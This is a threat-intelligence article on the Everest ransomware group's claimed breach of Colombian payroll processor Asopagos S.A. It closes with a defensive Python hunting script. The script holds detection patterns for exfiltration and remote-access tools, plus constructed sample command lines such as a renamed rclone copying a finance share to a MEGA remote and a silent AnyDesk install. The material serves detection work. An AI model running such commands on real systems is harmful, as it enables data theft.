On May 29, 2026, the Everest ransomware group added Colombian organization Asopagos S.A. to its dark web leak site, claiming responsibility for a successful intrusion and threatening to publish exfiltrated data unless ransom demands are met. The disclosure, surfaced by threat intelligence firm DeXpose, marks another escalation in Everest's sustained targeting of Latin American institutions throughout 2026.
What Happened
Everest operators posted Asopagos S.A. to their Tor-based leak portal on May 29, 2026. A listing at this stage normally means the intrusion and exfiltration phases are complete and the extortion phase of a double-extortion campaign has begun. The group has not yet published sample files, which suggests the victim is still inside the negotiation window that precedes staged leaks. Asopagos S.A. has issued no public statement confirming or denying the breach, the posted note contained no excerpted ransom demand, and Colombian sectoral regulators have not yet acknowledged a coordinated response.
What Was Taken
Everest has not disclosed data volumes or document categories in its initial listing, so the listing itself says nothing about what was taken. The group's standard tradecraft is bulk exfiltration of file shares, financial records, HR data, and customer databases before any encryption event. Given Asopagos S.A.'s role in Colombia's pension and payroll services ecosystem, exposed data would plausibly include personally identifiable information of contributors, banking instructions, social security identifiers, and internal financial records; none of this has been confirmed. Historical Everest leaks have ranged from tens of gigabytes to several terabytes per victim.
Why It Matters
Asopagos S.A. operates within Colombia's social security contribution processing space, so a confirmed breach could cascade into exposure of citizen data tied to pension, health, and labor risk affiliations. Everest's targeting through 2025 and 2026 has consistently favored financial intermediaries and government-adjacent service providers across Latin America, which points to a deliberate regional focus. For defenders across LATAM finance and fintech, the incident reinforces that mid-tier processors and aggregators remain priority targets: they concentrate data from many upstream institutions while running comparatively weaker perimeter controls than tier-one banks.
The Attack Technique
Everest has historically gained initial access through credentials purchased from initial access brokers, exploitation of internet-facing remote access services (RDP, VPN appliances), and credentials harvested from infostealer logs sold on Russian-language forums. Post-compromise, the group typically deploys legitimate remote management tools alongside Cobalt Strike for lateral movement and uses rclone or MEGA clients for data staging and exfiltration. Some engagements end with an encryption payload; others are run as extortion-only operations with no encryption at all, so the absence of encrypted hosts is not evidence that exfiltration did not occur. The specific intrusion vector at Asopagos S.A. has not been publicly disclosed.
What Organizations Should Do
- Audit exposure to infostealer-sourced credentials by matching dark web monitoring feeds against employee and partner email addresses, then force-reset every matched account and revoke its active sessions and refresh tokens, since a password change alone does not necessarily invalidate tokens an attacker already holds.
- Enforce phishing-resistant MFA on all external-facing services, prioritizing VPN, RDP, email, and privileged identity systems.
- Validate offline, immutable backup integrity through quarterly restore drills that measure actual recovery time against stated recovery time and recovery point objectives, and confirm those objectives meet regulatory continuity expectations.
- Hunt for Everest-associated tradecraft: rclone or MEGAcmd execution (including renamed binaries, which Sysmon's OriginalFileName field still identifies), AnyDesk or ScreenConnect installs on hosts or by accounts not approved to run them, and Cobalt Strike beacon traffic such as fixed-interval outbound connections from one workstation to a single external host.
- Segment critical financial processing environments from general corporate IT, limiting blast radius from a single compromised endpoint.
- Pre-engage legal counsel and incident response retainers so negotiation, regulatory notification, and forensic timelines can begin within hours rather than days of detection.
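The hunt for rclone/MEGAcmd execution, unauthorized remote-management installs, and beacon-like traffic, as an added example that is not from DeXpose, Everest reporting, or any vendor product. Event field names (Computer, User, Image, OriginalFileName, CommandLine) are modelled on Sysmon Event ID 1, the connection records on a proxy log; the sample events, the RMM allowlist, and the beacon thresholds are assumptions constructed for the example.

```python
"""Hunt for Everest-style tradecraft in endpoint and network telemetry.
Added example; field names follow Sysmon Event ID 1 and a proxy log.
All sample data below is constructed, not from any real incident."""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Hosts and accounts approved to run remote-management tools (assumption).
RMM_ALLOWLIST = {("helpdesk-01", r"CORP\svc_rmm")}

# Lowercase file names to watch; extend for your estate.
EXFIL_TOOLS = {"rclone.exe", "megaclient.exe", "mega-put.bat"}
RMM_TOOLS = {"anydesk.exe", "screenconnect.clientsetup.exe"}

# rclone data-moving subcommand followed by a named remote such as "mega:".
# Remote must be two or more characters so a drive letter ("C:") does not match.
RCLONE_EXFIL = re.compile(r"\b(copy|sync|move|moveto)\b.*\s[A-Za-z][\w-]+:", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt_process_events(events):
    """Return (host, rule, detail) findings from process-creation events."""
    findings = []
    for ev in events:
        on_disk = basename(ev["Image"])
        # OriginalFileName comes from the PE version resource, so it survives
        # the attacker renaming rclone.exe to something innocuous on disk.
        original = ev.get("OriginalFileName", "").lower()
        tool = original if original in EXFIL_TOOLS else on_disk
        host, cmd = ev["Computer"], ev["CommandLine"]
        if tool in EXFIL_TOOLS:
            if tool == "rclone.exe":
                if RCLONE_EXFIL.search(cmd):  # "rclone version" is not exfil
                    findings.append((host, "rclone_exfil", cmd))
            else:
                findings.append((host, "megacmd_exec", cmd))
            if on_disk != tool:
                findings.append((host, "renamed_exfil_tool", f"{on_disk} is really {tool}"))
        if on_disk in RMM_TOOLS and (host, ev["User"]) not in RMM_ALLOWLIST:
            findings.append((host, "unauthorized_rmm", f"{on_disk} run by {ev['User']}"))
    return findings


def find_beacons(connections, min_count=6, max_cv=0.2):
    """Flag (src, dst) pairs whose check-in intervals are too regular for a human.
    A Cobalt Strike beacon sleeps a fixed interval plus bounded jitter, so the
    coefficient of variation of its inter-arrival times stays small."""
    by_pair = defaultdict(list)
    for c in connections:
        by_pair[(c["src"], c["dst"])].append(datetime.fromisoformat(c["ts"]))
    beacons = []
    for pair, times in by_pair.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            beacons.append((pair, round(mean, 1), round(cv, 3)))
    return beacons


def _ev(host, user, image, original, cmd):
    return {"Computer": host, "User": user, "Image": image,
            "OriginalFileName": original, "CommandLine": cmd}


PROCESS_EVENTS = [  # constructed sample events
    # rclone renamed to svchost.exe pushing a finance share to a MEGA remote
    _ev("wks-fin-07", r"CORP\j.perez", r"C:\Users\j.perez\AppData\Local\Temp\svchost.exe",
        "rclone.exe", r'svchost.exe copy "\\fs01\finance" mega:backup --transfers 16 -P'),
    # MEGAcmd client uploading an HR export
    _ev("wks-hr-02", r"CORP\a.gomez", r"C:\Program Files\MEGAcmd\MEGAclient.exe",
        "MEGAclient.exe", r"MEGAclient.exe put C:\HR\export.zip /"),
    # AnyDesk silently installed by an ordinary user
    _ev("wks-fin-07", r"CORP\j.perez", r"C:\Users\j.perez\Downloads\AnyDesk.exe",
        "AnyDesk.exe", r"AnyDesk.exe --install C:\ProgramData\AnyDesk --silent"),
    # approved helpdesk host, real svchost, harmless rclone call: no findings
    _ev("helpdesk-01", r"CORP\svc_rmm", r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
        "AnyDesk.exe", "AnyDesk.exe --service"),
    _ev("wks-fin-07", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\svchost.exe",
        "svchost.exe", "svchost.exe -k netsvcs"),
    _ev("wks-it-03", r"CORP\m.ruiz", r"C:\Tools\rclone.exe", "rclone.exe", "rclone.exe version"),
]

_BASE = datetime(2026, 5, 29, 9, 0, 0)


def _conns(src, dst, offsets_s):
    return [{"ts": (_BASE + timedelta(seconds=o)).isoformat(), "src": src, "dst": dst}
            for o in offsets_s]


CONNECTIONS = (  # constructed: 60 s beacon with jitter, bursty browsing, too-short series
    _conns("10.20.30.7", "203.0.113.45", [0, 60, 115, 173, 225, 285, 342, 396])
    + _conns("10.20.30.8", "198.51.100.10", [0, 3, 9, 140, 141, 900, 1700])
    + _conns("10.20.30.9", "203.0.113.45", [0, 120, 240])
)

if __name__ == "__main__":
    for finding in hunt_process_events(PROCESS_EVENTS):
        print("PROC", *finding)
    for beacon in find_beacons(CONNECTIONS):
        print("BEACON", *beacon)
```

Run as-is, the script reports the renamed rclone and its MEGA upload, the MEGAclient upload, and the AnyDesk install by the finance user, but nothing for the approved helpdesk host, the real svchost, or the idle rclone invocation; only the 10.20.30.7 to 203.0.113.45 pair is flagged as beaconing. Tune max_cv and min_count against a baseline of your own proxy logs before relying on the beacon check, and feed it only connections to hosts outside your allowlist of known SaaS endpoints, since many legitimate agents also poll on a fixed schedule.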
Sources: Everest Ransomware Group Strikes Asopagos S.A. in Colombia - DeXpose